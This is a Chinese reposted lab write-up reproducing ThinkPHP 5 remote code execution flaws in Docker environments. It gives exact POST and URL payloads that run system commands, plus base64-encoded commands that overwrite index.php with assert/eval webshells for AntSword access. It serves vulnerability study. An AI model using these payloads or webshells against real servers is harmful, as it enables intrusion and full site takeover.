文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

ThinkPHP5系列远程代码执行漏洞复现(详细)

2023-08-31 09:27

关注

漏洞描述

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于框架对控制器名没有进行足够的检测,会导致在没有开启强制路由的情况下可执行任意方法,从而导致远程命令执行漏洞。 漏洞危害

环境搭建

启动环境

切换到/thinkphp/5.0.23-rce# 目录下

vim docker-compose.yml 

将version改为2,保存并退出

接着执行

docker-compose up -d

此时环境搭建成功

漏洞复现

在网页上利用POST构造payload

(1)查看目录下的文件(ls)

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

(2)查看id

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

(3)查看当前目录

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd

将上述代码改为phpinfo,发现是可以输出关于 PHP 配置的信息

_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

利用蚁剑工具getshell

由于存在过滤,需要用到base64加密来使我们的一句话木马上传成功

我们知道了一定存在index.php这个文件,那么我们就对其进行修改为一句话木马的样式

利用 echo “” >index.php 进行测试

为了显示我们成功注入,我们在其中添加字段变为

echo “aaabbb” >index.php

对引号内的进行base64,注意此时的引号不需要进行加密

经过测试,发现eval函数是注入不了的,需要替换为arrest函数才可以成功注入

所以

将aaabbb 进行base64编码

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > index.php

成功回显出aaabbb,说明是加入到了index.php里了

开始用蚁剑,URL地址填写我们一句话木马的位置

注意要选择char16和base64

测试连接成功

可以看到我们刚才写入的一句话

环境搭建

启动环境

切换到/thinkphp/5-rce# 目录下

vim docker-compose.yml 

将version改为2,保存并退出

接着执行

docker-compose up -d

此时环境以成功搭建

漏洞复现

(1)输出关于 PHP 配置的信息

/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

(2)whoami

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

(3)还可以将php代码写入文件

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=

接着访问shell.php

利用蚁剑工具getshell

由于存在过滤,需要用到base64加密来使我们的一句话木马上传成功

我们知道了一定存在index.php这个文件,那么我们就对其进行修改为一句话木马的样式

aabb

将上面的一句话进行base64加密

将一句话写入index.php

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo     -n YWE8P3BocCBAZXZhbCgkX1JFUVVFU1RbJ2F0dGFjayddKSA/PmJi | base64 -d > index.php

成功回显出aabb,说明是加入到了index.php里了

开始用蚁剑,URL地址填写我们一句话木马的位置

注意要选择char16和base64

测试连接成功

可以看到我们刚才写入的一句话

此时复现圆满完成~

来源地址:https://blog.csdn.net/weixin_53730939/article/details/129660066

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯